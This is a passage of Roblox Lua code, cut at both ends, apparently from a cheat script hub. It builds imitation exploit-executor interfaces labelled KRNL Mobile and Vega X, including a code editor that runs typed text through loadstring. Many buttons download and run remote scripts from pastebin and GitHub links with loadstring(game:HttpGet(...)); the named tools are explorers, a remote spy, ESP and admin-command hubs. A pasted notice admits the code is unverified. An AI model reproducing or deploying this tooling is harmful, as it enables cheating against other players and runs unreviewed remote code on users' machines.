button.MouseButton1Click:Connect(function() if SF2.Visible == true then SF2.Visible = false else --Nothing here to execute end mbutton.Visible = false text2.Text = "--Welcome To KRNL Mobile!" ab.Visible = true end) end coroutine.wrap(SUNEU_fake_script)() local function SFHZ_fake_script() -- addbutton.LocalScript local script = Instance.new('LocalScript', addbutton) local button = script.Parent local SF2 = script.Parent.Parent.Parent.ScrollingFrame2 local mbutton2 = script.Parent.Parent.Script2 local SF1 = script.Parent.Parent.Parent.ScrollingFrame1 button.MouseButton1Click:Connect(function() SF1.Visible = true button.Visible = false mbutton2.Visible = true end) end coroutine.wrap(SFHZ_fake_script)() local function XCUKBI_fake_script() -- ImageLabel_2.LocalScript local script = Instance.new('LocalScript', ImageLabel_2) local lua_keywords = {"and", "break", "do", "else", "elseif", "end", "false", "for", "function", "goto", "if", "in", "local", "nil", "not", "or", "repeat", "return", "then", "true", "until", "while"} local global_env = {"getrawmetatable", "game", "workspace", "script", "math", "string", "table", "print", "wait", "BrickColor", "Color3", "next", "pairs", "ipairs", "select", "unpack", "Instance", "new", "Vector2", "Vector3", "CFrame", "Ray", "UDim2", "Enum", "assert", "error", "warn", "tick", "loadstring", "_G", "shared", "getfenv", "setfenv", "newproxy", "setmetatable", "getmetatable", "os", "debug", "pcall", "ypcall", "xpcall", "rawequal", "rawset", "rawget", "tonumber", "tostring", "type", "typeof", "_VERSION", "coroutine", "delay", "require", "spawn", "LoadLibrary", "settings", "stats", "time", "UserSettings", "version", "Axes", "ColorSequence", "Faces", "ColorSequenceKeypoint", "NumberRange", "NumberSequence", "NumberSequenceKeypoint", "gcinfo", "elapsedTime", "collectgarbage", "PhysicalProperties", "Rect", "Region3", "Region3int16", "UDim", "Vector2int16", "Vector3int16"} local Source = script.Parent.EditorFrame.Source local Lines = Source.Parent.Lines local Highlight = function(string, keywords) local K = {} local S = string local Token = { ["="] = true, ["."] = true, [","] = true, ["("] = true, [")"] = true, ["["] = true, ["]"] = true, ["{"] = true, ["}"] = true, [":"] = true, ["*"] = true, ["/"] = true, ["+"] = true, ["-"] = true, ["%"] = true, [";"] = true, ["~"] = true } for i, v in pairs(keywords) do K[v] = true end S = S:gsub(".", function(c) if Token[c] ~= nil then return "\32" else return c end end) S = S:gsub("%S+", function(c) if K[c] ~= nil then return c else return (" "):rep(#c) end end) return S end local hTokens = function(string) local Token = { ["="] = true, ["."] = true, [","] = true, ["("] = true, [")"] = true, ["["] = true, ["]"] = true, ["{"] = true, ["}"] = true, [":"] = true, ["*"] = true, ["/"] = true, ["+"] = true, ["-"] = true, ["%"] = true, [";"] = true, ["~"] = true } local A = "" string:gsub(".", function(c) if Token[c] ~= nil then A = A .. c elseif c == "\n" then A = A .. "\n" elseif c == "\t" then A = A .. "\t" else A = A .. "\32" end end) return A end local strings = function(string) local highlight = "" local quote = false string:gsub(".", function(c) if quote == false and c == "\"" then quote = true elseif quote == true and c == "\"" then quote = false end if quote == false and c == "\"" then highlight = highlight .. "\"" elseif c == "\n" then highlight = highlight .. "\n" elseif c == "\t" then highlight = highlight .. "\t" elseif quote == true then highlight = highlight .. c elseif quote == false then highlight = highlight .. "\32" end end) return highlight end local comments = function(string) local ret = "" string:gsub("[^\r\n]+", function(c) local comm = false local i = 0 c:gsub(".", function(n) i = i + 1 if c:sub(i, i + 1) == "--" then comm = true end if comm == true then ret = ret .. n else ret = ret .. "\32" end end) ret = ret end) return ret end local numbers = function(string) local A = "" string:gsub(".", function(c) if tonumber(c) ~= nil then A = A .. c elseif c == "\n" then A = A .. "\n" elseif c == "\t" then A = A .. "\t" else A = A .. "\32" end end) return A end local highlight_source = function(type) if type == "Text" then Source.Text = Source.Text:gsub("\13", "") Source.Text = Source.Text:gsub("\t", " ") local s = Source.Text Source.Keywords_.Text = Highlight(s, lua_keywords) Source.Globals_.Text = Highlight(s, global_env) Source.RemoteHighlight_.Text = Highlight(s, {"FireServer", "fireServer", "InvokeServer", "invokeServer"}) Source.Tokens_.Text = hTokens(s) Source.Numbers_.Text = numbers(s) Source.Strings_.Text = strings(s) local lin = 1 s:gsub("\n", function() lin = lin + 1 end) Lines.Text = "" for i = 1, lin do Lines.Text = Lines.Text .. i .. "\n" end end end highlight_source("Text") Source.Changed:Connect(highlight_source) end coroutine.wrap(XCUKBI_fake_script)() local function VVLPP_fake_script() -- ImageLabel_3.LocalScript local script = Instance.new('LocalScript', ImageLabel_3) local lua_keywords = {"and", "break", "do", "else", "elseif", "end", "false", "for", "function", "goto", "if", "in", "local", "nil", "not", "or", "repeat", "return", "then", "true", "until", "while"} local global_env = {"getrawmetatable", "game", "workspace", "script", "math", "string", "table", "print", "wait", "BrickColor", "Color3", "next", "pairs", "ipairs", "select", "unpack", "Instance", "new", "Vector2", "Vector3", "CFrame", "Ray", "UDim2", "Enum", "assert", "error", "warn", "tick", "loadstring", "_G", "shared", "getfenv", "setfenv", "newproxy", "setmetatable", "getmetatable", "os", "debug", "pcall", "ypcall", "xpcall", "rawequal", "rawset", "rawget", "tonumber", "tostring", "type", "typeof", "_VERSION", "coroutine", "delay", "require", "spawn", "LoadLibrary", "settings", "stats", "time", "UserSettings", "version", "Axes", "ColorSequence", "Faces", "ColorSequenceKeypoint", "NumberRange", "NumberSequence", "NumberSequenceKeypoint", "gcinfo", "elapsedTime", "collectgarbage", "PhysicalProperties", "Rect", "Region3", "Region3int16", "UDim", "Vector2int16", "Vector3int16"} local Source = script.Parent.EditorFrame.Source local Lines = Source.Parent.Lines local Highlight = function(string, keywords) local K = {} local S = string local Token = { ["="] = true, ["."] = true, [","] = true, ["("] = true, [")"] = true, ["["] = true, ["]"] = true, ["{"] = true, ["}"] = true, [":"] = true, ["*"] = true, ["/"] = true, ["+"] = true, ["-"] = true, ["%"] = true, [";"] = true, ["~"] = true } for i, v in pairs(keywords) do K[v] = true end S = S:gsub(".", function(c) if Token[c] ~= nil then return "\32" else return c end end) S = S:gsub("%S+", function(c) if K[c] ~= nil then return c else return (" "):rep(#c) end end) return S end local hTokens = function(string) local Token = { ["="] = true, ["."] = true, [","] = true, ["("] = true, [")"] = true, ["["] = true, ["]"] = true, ["{"] = true, ["}"] = true, [":"] = true, ["*"] = true, ["/"] = true, ["+"] = true, ["-"] = true, ["%"] = true, [";"] = true, ["~"] = true } local A = "" string:gsub(".", function(c) if Token[c] ~= nil then A = A .. c elseif c == "\n" then A = A .. "\n" elseif c == "\t" then A = A .. "\t" else A = A .. "\32" end end) return A end local strings = function(string) local highlight = "" local quote = false string:gsub(".", function(c) if quote == false and c == "\"" then quote = true elseif quote == true and c == "\"" then quote = false end if quote == false and c == "\"" then highlight = highlight .. "\"" elseif c == "\n" then highlight = highlight .. "\n" elseif c == "\t" then highlight = highlight .. "\t" elseif quote == true then highlight = highlight .. c elseif quote == false then highlight = highlight .. "\32" end end) return highlight end local comments = function(string) local ret = "" string:gsub("[^\r\n]+", function(c) local comm = false local i = 0 c:gsub(".", function(n) i = i + 1 if c:sub(i, i + 1) == "--" then comm = true end if comm == true then ret = ret .. n else ret = ret .. "\32" end end) ret = ret end) return ret end local numbers = function(string) local A = "" string:gsub(".", function(c) if tonumber(c) ~= nil then A = A .. c elseif c == "\n" then A = A .. "\n" elseif c == "\t" then A = A .. "\t" else A = A .. "\32" end end) return A end local highlight_source = function(type) if type == "Text" then Source.Text = Source.Text:gsub("\13", "") Source.Text = Source.Text:gsub("\t", " ") local s = Source.Text Source.Keywords_.Text = Highlight(s, lua_keywords) Source.Globals_.Text = Highlight(s, global_env) Source.RemoteHighlight_.Text = Highlight(s, {"FireServer", "fireServer", "InvokeServer", "invokeServer"}) Source.Tokens_.Text = hTokens(s) Source.Numbers_.Text = numbers(s) Source.Strings_.Text = strings(s) local lin = 1 s:gsub("\n", function() lin = lin + 1 end) Lines.Text = "" for i = 1, lin do Lines.Text = Lines.Text .. i .. "\n" end end end highlight_source("Text") Source.Changed:Connect(highlight_source) end coroutine.wrap(VVLPP_fake_script)() local function WMPZGUU_fake_script() -- Execute.LocalScript local script = Instance.new('LocalScript', Execute) script.Parent.MouseButton1Down:Connect(function() loadstring(script.Parent.Parent.Parent.MainGUI.ExecuteBar.ScrollingFrame1.ImageLabel.EditorFrame.Source.Text)() end) end coroutine.wrap(WMPZGUU_fake_script)() local function UDBRM_fake_script() -- Clear.LocalScript local script = Instance.new('LocalScript', Clear) local button = script.Parent local text1 = script.Parent.Parent.Parent.MainGUI.ExecuteBar.ScrollingFrame1.ImageLabel.EditorFrame.Source button.MouseButton1Click:Connect(function() text1.Text = "" end) end coroutine.wrap(UDBRM_fake_script)() local function BFFHFLM_fake_script() -- InjectButton.LocalScript local script = Instance.new('LocalScript', InjectButton) local btn = script.Parent local Gui = script.Parent.Parent.Parent.InjectedMessgae btn.MouseButton1Click:Connect(function() Gui.Visible = true end) end coroutine.wrap(BFFHFLM_fake_script)() local function MRVGBRW_fake_script() -- KrnlGUI.Drag local script = Instance.new('LocalScript', KrnlGUI) local frame = script.Parent frame.Draggable = true frame.Active = true frame.Selectable = true end coroutine.wrap(MRVGBRW_fake_script)() local function QVFBOG_fake_script() -- Xbutton_2.LocalScript local script = Instance.new('LocalScript', Xbutton_2) local btn = script.Parent local Gui = script.Parent.Parent.Parent btn.MouseButton1Click:Connect(function() Gui.Visible = false end) end coroutine.wrap(QVFBOG_fake_script)() local function VEDCZN_fake_script() -- Okbutton.LocalScript local script = Instance.new('LocalScript', Okbutton) local btn = script.Parent local Gui = script.Parent.Parent.Parent btn.MouseButton1Click:Connect(function() Gui.Visible = false end) end coroutine.wrap(VEDCZN_fake_script)() local function IHNUMQ_fake_script() -- InjectedMessgae.Drag local script = Instance.new('LocalScript', InjectedMessgae) local frame = script.Parent frame.Draggable = true frame.Active = true frame.Selectable = true end coroutine.wrap(IHNUMQ_fake_script)() local function FJVQORH_fake_script() -- DexExplorer.LocalScript local script = Instance.new('LocalScript', DexExplorer) local btn = script.Parent btn.MouseButton1Click:Connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/peyton2465/Dex/master/out.lua"))() end) end coroutine.wrap(FJVQORH_fake_script)() local function WHQB_fake_script() -- OpenGui.LocalScript local script = Instance.new('LocalScript', OpenGui) local btn = script.Parent btn.MouseButton1Click:Connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/UXmbai5q", true))() end) end coroutine.wrap(WHQB_fake_script)() local function QHYNL_fake_script() -- RemoteSpy.LocalScript local script = Instance.new('LocalScript', RemoteSpy) local btn = script.Parent btn.MouseButton1Click:Connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua"))(); end) end coroutine.wrap(QHYNL_fake_script)() local function XVQL_fake_script() -- DarkDex.LocalScript local script = Instance.new('LocalScript', DarkDex) local btn = script.Parent btn.MouseButton1Click:Connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/fPP8bZ8Z"))() end) end coroutine.wrap(XVQL_fake_script)() local function HYBOB_fake_script() -- UnamedEsp.LocalScript local script = Instance.new('LocalScript', UnamedEsp) local btn = script.Parent btn.MouseButton1Click:Connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/kvr0AuWz"))() end) end coroutine.wrap(HYBOB_fake_script)() local function GKEBA_fake_script() -- IYFE.LocalScript local script = Instance.new('LocalScript', IYFE) local btn = script.Parent btn.MouseButton1Click:Connect(function() loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))() end) end coroutine.wrap(GKEBA_fake_script)() local function NHAHP_fake_script() -- OwlHub.LocalScript local script = Instance.new('LocalScript', OwlHub) local btn = script.Parent btn.MouseButton1Click:Connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/CriShoux/OwlHub/master/OwlHub.txt"))(); end) end coroutine.wrap(NHAHP_fake_script)() local function RZTRLAR_fake_script() -- HoHoHub.LocalScript local script = Instance.new('LocalScript', HoHoHub) local btn = script.Parent btn.MouseButton1Click:Connect(function() loadstring(game:HttpGet('https://raw.githubusercontent.com/acsu123/HOHO_H/main/Loading_UI'))() end) end coroutine.wrap(RZTRLAR_fake_script)() local function ZVNIN_fake_script() -- Xbutton_3.LocalScript local script = Instance.new('LocalScript', Xbutton_3) local btn = script.Parent local Gui = script.Parent.Parent.Parent btn.MouseButton1Click:Connect(function() Gui.Visible = false end) end coroutine.wrap(ZVNIN_fake_script)() local function LRQQGX_fake_script() -- CreditsW.Drag local script = Instance.new('LocalScript', CreditsW) local frame = script.Parent frame.Draggable = true frame.Active = true frame.Selectable = true end coroutine.wrap(LRQQGX_fake_script)() local function UAPXMMK_fake_script() -- WHy.LocalScript local script = Instance.new('LocalScript', WHy) local btn = script.Parent btn.MouseButton1Click:Connect(function() print("Clicked") end) end coroutine.wrap(UAPXMMK_fake_script)() local function TEITRZP_fake_script() -- Nope.LocalScript local script = Instance.new('LocalScript', Nope) local btn = script.Parent btn.MouseButton1Click:Connect(function() print("Clicked") end) end coroutine.wrap(TEITRZP_fake_script)() local function BOLKY_fake_script() -- KillTask.LocalScript local script = Instance.new('LocalScript', KillTask) local btn = script.Parent btn.MouseButton1Click:Connect(function() print("Clicked") end) end coroutine.wrap(BOLKY_fake_script)() local function LRTUSOX_fake_script() -- Inject.LocalScript local script = Instance.new('LocalScript', Inject) local btn = script.Parent local Gui = script.Parent.Parent.Parent.InjectedMessgae btn.MouseButton1Click:Connect(function() Gui.Visible = true end) end coroutine.wrap(LRTUSOX_fake_script)() local function IVCU_fake_script() -- Xbutton_4.LocalScript local script = Instance.new('LocalScript', Xbutton_4) local btn = script.Parent local Gui = script.Parent.Parent.Parent btn.MouseButton1Click:Connect(function() Gui.Visible = false end) end coroutine.wrap(IVCU_fake_script)() local function OWFEJ_fake_script() -- Okbutton_2.LocalScript local script = Instance.new('LocalScript', Okbutton_2) local btn = script.Parent local Gui = script.Parent.Parent.Parent btn.MouseButton1Click:Connect(function() Gui.Visible = false end) end coroutine.wrap(OWFEJ_fake_script)() local function XCQNHP_fake_script() -- GamesOpenGUI.Drag local script = Instance.new('LocalScript', GamesOpenGUI) local frame = script.Parent frame.Draggable = true frame.Active = true frame.Selectable = true end coroutine.wrap(XCQNHP_fake_script)() local function JKEPNNP_fake_script() -- FloatingGUI.Drag local script = Instance.new('LocalScript', FloatingGUI) local frame = script.Parent frame.Draggable = true frame.Active = true frame.Selectable = true end coroutine.wrap(JKEPNNP_fake_script)() local function LTLHER_fake_script() -- FloatingGUI.LocalScript local script = Instance.new('LocalScript', FloatingGUI) local btn = script.Parent local Gui = script.Parent.Parent.KrnlGUI btn.MouseButton1Click:Connect(function() Gui.Visible = true btn.Visible = false end) end coroutine.wrap(LTLHER_fake_script)() end) Section:NewButton("Vega X", "VEGA X", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] -- Gui to Lua -- Version: 3.2 -- Instances: local VegaXAndroidUI = Instance.new("ScreenGui") local SettingsWindow = Instance.new("Frame") local WindowMainTitle = Instance.new("TextLabel") local CloseB = Instance.new("ImageButton") local ScrollingFrame = Instance.new("ScrollingFrame") local UIListLayout = Instance.new("UIListLayout") local S0 = Instance.new("Frame") local Title = Instance.new("TextLabel") local SubTitle = Instance.new("TextLabel") local UICorner = Instance.new("UICorner") local UIGradient = Instance.new("UIGradient") local VegaXLogo = Instance.new("ImageLabel") local S2 = Instance.new("Frame") local Title_2 = Instance.new("TextLabel") local SubTitle_2 = Instance.new("TextLabel") local UICorner_2 = Instance.new("UICorner") local SubmitFPS = Instance.new("ImageButton") local UICorner_3 = Instance.new("UICorner") local FPSTextBox = Instance.new("TextBox") local UICorner_4 = Instance.new("UICorner") local ResetFPS = Instance.new("ImageButton") local UICorner_5 = Instance.new("UICorner") local S3 = Instance.new("Frame") local Title_3 = Instance.new("TextLabel") local SubTitle_3 = Instance.new("TextLabel") local UICorner_6 = Instance.new("UICorner") local SubmitCode = Instance.new("ImageButton") local UICorner_7 = Instance.new("UICorner") local InjectCodeTextbox = Instance.new("TextBox") local UICorner_8 = Instance.new("UICorner") local ResetCode = Instance.new("ImageButton") local UICorner_9 = Instance.new("UICorner") local S1 = Instance.new("Frame") local Title_4 = Instance.new("TextLabel") local SubTitle_4 = Instance.new("TextLabel") local UICorner_10 = Instance.new("UICorner") local AccentColorPreview = Instance.new("Frame") local UICorner_11 = Instance.new("UICorner") local SubmitAccent = Instance.new("ImageButton") local UICorner_12 = Instance.new("UICorner") local AccentTextBox = Instance.new("TextBox") local UICorner_13 = Instance.new("UICorner") local S4 = Instance.new("Frame") local Title_5 = Instance.new("TextLabel") local SubTitle_5 = Instance.new("TextLabel") local UICorner_14 = Instance.new("UICorner") local ToggleBTN = Instance.new("TextButton") local UICorner_15 = Instance.new("UICorner") local ScriptHubWindow = Instance.new("Frame") local WindowMainTitle_2 = Instance.new("TextLabel") local CloseB_2 = Instance.new("ImageButton") local ScrollingFrame_2 = Instance.new("ScrollingFrame") local S1_2 = Instance.new("Frame") local Execute = Instance.new("ImageButton") local UICorner_16 = Instance.new("UICorner") local UICorner_17 = Instance.new("UICorner") local ImageLabel = Instance.new("ImageLabel") local UICorner_18 = Instance.new("UICorner") local SubTitle_6 = Instance.new("TextLabel") local Title_6 = Instance.new("TextLabel") local UIListLayout_2 = Instance.new("UIListLayout") local SearchBox = Instance.new("TextBox") local UICorner_19 = Instance.new("UICorner") local SearchButton = Instance.new("ImageButton") local WindowSubTitle = Instance.new("TextLabel") local PaginationFrame = Instance.new("Frame") local UICorner_20 = Instance.new("UICorner") local LeftPage = Instance.new("ImageButton") local RightPage = Instance.new("ImageButton") local PageLabel = Instance.new("TextLabel") local ExecutorWindow = Instance.new("Frame") local ExecuteB = Instance.new("TextButton") local UICorner_21 = Instance.new("UICorner") local PasteandExecuteB = Instance.new("TextButton") local UICorner_22 = Instance.new("UICorner") local CloseB_3 = Instance.new("ImageButton") local ScrollingBox = Instance.new("ScrollingFrame") local TextBox = Instance.new("TextBox") local Line = Instance.new("TextLabel") local UICorner_23 = Instance.new("UICorner") local TabbingSystem = Instance.new("Frame") local ScriptPage = Instance.new("TextLabel") local NextPage = Instance.new("TextButton") local LastPage = Instance.new("TextButton") local UICorner_24 = Instance.new("UICorner") local EditTabName = Instance.new("ImageButton") local EditTabBox = Instance.new("TextBox") local WindowMainTitle_3 = Instance.new("TextLabel") local ClearB = Instance.new("TextButton") local UICorner_25 = Instance.new("UICorner") local DevModeB = Instance.new("TextButton") local UICorner_26 = Instance.new("UICorner") local SidebarFrame = Instance.new("Frame") local Banner = Instance.new("Frame") local HappyGuy = Instance.new("ImageLabel") local VegaXLogo_2 = Instance.new("ImageLabel") local TitleLabel = Instance.new("TextLabel") local ScrollingFrame_3 = Instance.new("ScrollingFrame") local UIListLayout_3 = Instance.new("UIListLayout") local UsernamePlace = Instance.new("Frame") local Title_7 = Instance.new("TextLabel") local Icon = Instance.new("Frame") local UICorner_27 = Instance.new("UICorner") local ProfileImage = Instance.new("ImageLabel") local UICorner_28 = Instance.new("UICorner") local Choice1 = Instance.new("Frame") local Title_8 = Instance.new("TextLabel") local C1EB = Instance.new("TextButton") local UICorner_29 = Instance.new("UICorner") local Icon_2 = Instance.new("Frame") local UICorner_30 = Instance.new("UICorner") local ImageLabel_2 = Instance.new("ImageLabel") local Choice2 = Instance.new("Frame") local Title_9 = Instance.new("TextLabel") local C2EB = Instance.new("TextButton") local UICorner_31 = Instance.new("UICorner") local Icon_3 = Instance.new("Frame") local UICorner_32 = Instance.new("UICorner") local ImageLabel_3 = Instance.new("ImageLabel") local Choice3 = Instance.new("Frame") local Title_10 = Instance.new("TextLabel") local C3EB = Instance.new("TextButton") local UICorner_33 = Instance.new("UICorner") local Icon_4 = Instance.new("Frame") local UICorner_34 = Instance.new("UICorner") local ImageLabel_4 = Instance.new("ImageLabel") local VegaXMenuToggleFrame = Instance.new("Frame") local UICorner_35 = Instance.new("UICorner") local VegaXMenuToggle = Instance.new("TextButton") local UICorner_36 = Instance.new("UICorner") local ImageLabel_5 = Instance.new("ImageLabel") local DragTouch = Instance.new("ImageLabel") local KeySystem = Instance.new("Frame") local MainTitle = Instance.new("TextLabel") local CloseB_4 = Instance.new("ImageButton") local TextBox_2 = Instance.new("TextBox") local UICorner_37 = Instance.new("UICorner") local ApproveKeyB = Instance.new("TextButton") local UICorner_38 = Instance.new("UICorner") local EULALabel = Instance.new("TextLabel") local GetKeyB = Instance.new("TextButton") local UICorner_39 = Instance.new("UICorner") local JoinDiscordB = Instance.new("TextButton") local UICorner_40 = Instance.new("UICorner") local Banner_2 = Instance.new("Frame") local VegaXLogo_3 = Instance.new("ImageLabel") local UICorner_41 = Instance.new("UICorner") local HappyGuy_2 = Instance.new("ImageLabel") local TitleLabel_2 = Instance.new("TextLabel") local ScrollingBox_2 = Instance.new("ScrollingFrame") local TextBox_3 = Instance.new("TextBox") local UICorner_42 = Instance.new("UICorner") local SubTitle_7 = Instance.new("TextLabel") local KSMenuToggleFrame = Instance.new("Frame") local UICorner_43 = Instance.new("UICorner") local VegaXKSToggle = Instance.new("TextButton") local UICorner_44 = Instance.new("UICorner") local ImageLabel_6 = Instance.new("ImageLabel") local IntroFrame = Instance.new("Frame") local BackgroundFrame = Instance.new("Frame") local R1 = Instance.new("Frame") local R2 = Instance.new("Frame") local R3 = Instance.new("Frame") local R4 = Instance.new("Frame") local R5 = Instance.new("Frame") local R6 = Instance.new("Frame") local R7 = Instance.new("Frame") local R8 = Instance.new("Frame") local R9 = Instance.new("Frame") local R10 = Instance.new("Frame") local R11 = Instance.new("Frame") local R12 = Instance.new("Frame") local R13 = Instance.new("Frame") local R14 = Instance.new("Frame") local R15 = Instance.new("Frame") local R16 = Instance.new("Frame") local R17 = Instance.new("Frame") local R18 = Instance.new("Frame") local R19 = Instance.new("Frame") local R20 = Instance.new("Frame") local VegaXLogo_4 = Instance.new("ImageLabel") local ScriptListWindow = Instance.new("Frame") local WindowMainTitle_4 = Instance.new("TextLabel") local CloseB_5 = Instance.new("ImageButton") local ScriptListFrame = Instance.new("ScrollingFrame") local S1_3 = Instance.new("Frame") local Trash = Instance.new("ImageButton") local UICorner_45 = Instance.new("UICorner") local UICorner_46 = Instance.new("UICorner") local Title_11 = Instance.new("TextLabel") local Execute_2 = Instance.new("ImageButton") local UICorner_47 = Instance.new("UICorner") local UIListLayout_4 = Instance.new("UIListLayout") local WindowSubTitle_2 = Instance.new("TextLabel") --Properties: VegaXAndroidUI.Name = "VegaXAndroidUI" VegaXAndroidUI.Parent = gethui() SettingsWindow.Name = "SettingsWindow" SettingsWindow.Parent = VegaXAndroidUI SettingsWindow.AnchorPoint = Vector2.new(0, 0.5) SettingsWindow.BackgroundColor3 = Color3.fromRGB(20, 20, 20) SettingsWindow.BorderColor3 = Color3.fromRGB(30, 30, 30) SettingsWindow.BorderSizePixel = 0 SettingsWindow.Position = UDim2.new(1, 200, 0.5, -20) SettingsWindow.Size = UDim2.new(1, -200, 1, 40) WindowMainTitle.Name = "WindowMainTitle" WindowMainTitle.Parent = SettingsWindow WindowMainTitle.BackgroundColor3 = Color3.fromRGB(255, 255, 255) WindowMainTitle.BackgroundTransparency = 1.000 WindowMainTitle.BorderSizePixel = 0 WindowMainTitle.Position = UDim2.new(0, 7, 0, 52) WindowMainTitle.Size = UDim2.new(0, 200, 0, 21) WindowMainTitle.Font = Enum.Font.GothamBold WindowMainTitle.Text = "Settings" WindowMainTitle.TextColor3 = Color3.fromRGB(255, 255, 255) WindowMainTitle.TextSize = 18.000 WindowMainTitle.TextXAlignment = Enum.TextXAlignment.Left WindowMainTitle.TextYAlignment = Enum.TextYAlignment.Top CloseB.Name = "CloseB" CloseB.Parent = SettingsWindow CloseB.AnchorPoint = Vector2.new(1, 0) CloseB.BackgroundTransparency = 1.000 CloseB.BorderSizePixel = 0 CloseB.LayoutOrder = 6 CloseB.Position = UDim2.new(1, -5, 0, 45) CloseB.Size = UDim2.new(0, 25, 0, 25) CloseB.ZIndex = 2 CloseB.Image = "rbxassetid://3926307971" CloseB.ImageRectOffset = Vector2.new(884, 284) CloseB.ImageRectSize = Vector2.new(36, 36) ScrollingFrame.Parent = SettingsWindow ScrollingFrame.Active = true ScrollingFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ScrollingFrame.BackgroundTransparency = 1.000 ScrollingFrame.BorderSizePixel = 0 ScrollingFrame.Position = UDim2.new(0, 0, 0, 78) ScrollingFrame.Size = UDim2.new(1, 0, 1, -78) ScrollingFrame.CanvasSize = UDim2.new(0, 0, 1.5, 0) ScrollingFrame.ScrollBarThickness = 0 UIListLayout.Parent = ScrollingFrame UIListLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center UIListLayout.SortOrder = Enum.SortOrder.LayoutOrder UIListLayout.Padding = UDim.new(0, 5) S0.Name = "S0" S0.Parent = ScrollingFrame S0.BackgroundColor3 = Color3.fromRGB(255, 255, 255) S0.BorderSizePixel = 0 S0.Size = UDim2.new(1, -10, 0, 75) Title.Name = "Title" Title.Parent = S0 Title.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Title.BackgroundTransparency = 1.000 Title.BorderSizePixel = 0 Title.Position = UDim2.new(0, 87, 0, 0) Title.Size = UDim2.new(0.5, 0, 0.5, 0) Title.Font = Enum.Font.GothamBold Title.Text = "Vega X 4.0" Title.TextColor3 = Color3.fromRGB(255, 255, 255) Title.TextSize = 19.000 Title.TextXAlignment = Enum.TextXAlignment.Left Title.TextYAlignment = Enum.TextYAlignment.Bottom SubTitle.Name = "SubTitle" SubTitle.Parent = S0 SubTitle.BackgroundColor3 = Color3.fromRGB(255, 255, 255) SubTitle.BackgroundTransparency = 1.000 SubTitle.BorderSizePixel = 0 SubTitle.Position = UDim2.new(0, 87, 0.5, 0) SubTitle.Size = UDim2.new(0.5, 0, 0.5, 0) SubTitle.Font = Enum.Font.Gotham SubTitle.Text = "Developed by 1 F0 & Rudy" SubTitle.TextColor3 = Color3.fromRGB(255, 255, 255) SubTitle.TextSize = 14.000 SubTitle.TextXAlignment = Enum.TextXAlignment.Left SubTitle.TextYAlignment = Enum.TextYAlignment.Top UICorner.CornerRadius = UDim.new(0, 10) UICorner.Parent = S0 UIGradient.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(195, 57, 57)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(255, 85, 88))} UIGradient.Parent = S0 VegaXLogo.Name = "VegaXLogo" VegaXLogo.Parent = S0 VegaXLogo.AnchorPoint = Vector2.new(0, 0.5) VegaXLogo.BackgroundColor3 = Color3.fromRGB(255, 255, 255) VegaXLogo.BackgroundTransparency = 1.000 VegaXLogo.BorderSizePixel = 0 VegaXLogo.Position = UDim2.new(0, 25, 0.5, 0) VegaXLogo.Size = UDim2.new(0, 52, 0, 52) VegaXLogo.ZIndex = 21 VegaXLogo.Image = "http://www.roblox.com/asset/?id=15861930865" S2.Name = "S2" S2.Parent = ScrollingFrame S2.BackgroundColor3 = Color3.fromRGB(38, 38, 38) S2.BorderSizePixel = 0 S2.Size = UDim2.new(1, -10, 0, 75) Title_2.Name = "Title" Title_2.Parent = S2 Title_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Title_2.BackgroundTransparency = 1.000 Title_2.BorderSizePixel = 0 Title_2.Position = UDim2.new(0, 25, 0, 0) Title_2.Size = UDim2.new(0.5, 0, 0.5, 0) Title_2.Font = Enum.Font.GothamBold Title_2.Text = "FPS Limit" Title_2.TextColor3 = Color3.fromRGB(255, 255, 255) Title_2.TextSize = 19.000 Title_2.TextXAlignment = Enum.TextXAlignment.Left Title_2.TextYAlignment = Enum.TextYAlignment.Bottom SubTitle_2.Name = "SubTitle" SubTitle_2.Parent = S2 SubTitle_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) SubTitle_2.BackgroundTransparency = 1.000 SubTitle_2.BorderSizePixel = 0 SubTitle_2.Position = UDim2.new(0, 25, 0.5, 0) SubTitle_2.Size = UDim2.new(0.5, 0, 0.5, 0) SubTitle_2.Font = Enum.Font.Gotham SubTitle_2.Text = "Set Max FPS for the Game." SubTitle_2.TextColor3 = Color3.fromRGB(255, 255, 255) SubTitle_2.TextSize = 14.000 SubTitle_2.TextXAlignment = Enum.TextXAlignment.Left SubTitle_2.TextYAlignment = Enum.TextYAlignment.Top UICorner_2.CornerRadius = UDim.new(0, 10) UICorner_2.Parent = S2 SubmitFPS.Name = "SubmitFPS" SubmitFPS.Parent = S2 SubmitFPS.AnchorPoint = Vector2.new(1, 0.5) SubmitFPS.BackgroundColor3 = Color3.fromRGB(67, 67, 67) SubmitFPS.BorderSizePixel = 0 SubmitFPS.LayoutOrder = 10 SubmitFPS.Position = UDim2.new(1, -59, 0.5, 0) SubmitFPS.Size = UDim2.new(0, 34, 0, 34) SubmitFPS.ZIndex = 2 SubmitFPS.Image = "rbxassetid://3926305904" SubmitFPS.ImageRectOffset = Vector2.new(124, 924) SubmitFPS.ImageRectSize = Vector2.new(36, 36) UICorner_3.CornerRadius = UDim.new(0, 10) UICorner_3.Parent = SubmitFPS FPSTextBox.Name = "FPSTextBox" FPSTextBox.Parent = S2 FPSTextBox.AnchorPoint = Vector2.new(1, 0.5) FPSTextBox.BackgroundColor3 = Color3.fromRGB(89, 89, 89) FPSTextBox.BackgroundTransparency = 0.200 FPSTextBox.BorderSizePixel = 0 FPSTextBox.Position = UDim2.new(1, -98, 0.5, 0) FPSTextBox.Size = UDim2.new(0.200000003, 0, 0, 34) FPSTextBox.ClearTextOnFocus = false FPSTextBox.Font = Enum.Font.Gotham FPSTextBox.MultiLine = true FPSTextBox.PlaceholderText = "Max FPS" FPSTextBox.Text = "" FPSTextBox.TextColor3 = Color3.fromRGB(220, 220, 220) FPSTextBox.TextSize = 